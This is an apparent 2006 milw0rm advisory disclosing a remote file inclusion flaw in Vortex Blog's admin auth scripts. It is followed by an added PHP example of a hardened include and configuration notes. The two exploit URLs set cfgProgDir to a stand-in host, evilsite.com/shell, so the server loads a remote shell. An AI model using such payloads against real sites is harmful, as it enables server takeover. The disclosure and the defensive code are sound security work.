**********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************

* Portal Name : Vortex Blog AKA vBlog

* Class = Remote File Inclusion ;

* Download = http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

----------------------------------------------------------------------------------------------------------

- Vulnerable Code:

include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
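
Added example, not part of the original advisory or of the vBlog code: the vulnerable include shown beside a hardened form. It assumes the affected scripts run with register_globals enabled, so that a cfgProgDir request parameter populates $cfgProgDir, and that session.php sits in the script's own directory; VBLOG_AUTH_DIR and vblog_safe_include() are hypothetical names.

```php
<?php
// Added example; every name except $cfgProgDir and session.php is hypothetical.

// --- Vulnerable pattern from the advisory (shown for comparison, not executed) ---
// $cfgProgDir is never initialised in the script, so under register_globals=On
// (assumption) a request parameter of the same name decides what is included:
//     include($cfgProgDir . "session.php");

// --- Hardened form ---
// 1. Derive the directory from the script's own location, never from input.
// 2. Allow-list the file name and confirm the resolved path stays in that directory.
// 3. Reject and log requests that try to supply the variable at all.

define('VBLOG_AUTH_DIR', realpath(__DIR__) . DIRECTORY_SEPARATOR);

function vblog_safe_include(string $file): void
{
    // Only known file names may be included; anything else is refused.
    static $allowed = ['session.php'];
    if (!in_array($file, $allowed, true)) {
        throw new RuntimeException('include target not allow-listed');
    }

    // realpath() resolves local filesystem paths only. It returns false for a
    // missing file and for a URL such as http://..., so a remote location
    // can never pass this check.
    $path = realpath(VBLOG_AUTH_DIR . $file);
    if ($path === false || strpos($path, VBLOG_AUTH_DIR) !== 0) {
        throw new RuntimeException('include target outside auth directory');
    }

    require $path;
}

// Legitimate callers never send this parameter, so its presence is a signal.
if (isset($_GET['cfgProgDir']) || isset($_POST['cfgProgDir']) || isset($_COOKIE['cfgProgDir'])) {
    http_response_code(400);
    error_log('cfgProgDir supplied in request from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    exit;
}

vblog_safe_include('session.php');
```

Independently of the code change, allow_url_include = Off (the default since PHP 5.2.0) stops include from fetching URLs, and register_globals was removed in PHP 5.4.
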

----------------------------------------------------------------------------------------------------------

Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To My Best Friend : Tanha

**********************************************************************************************************

# milw0rm.com [2006-11-08]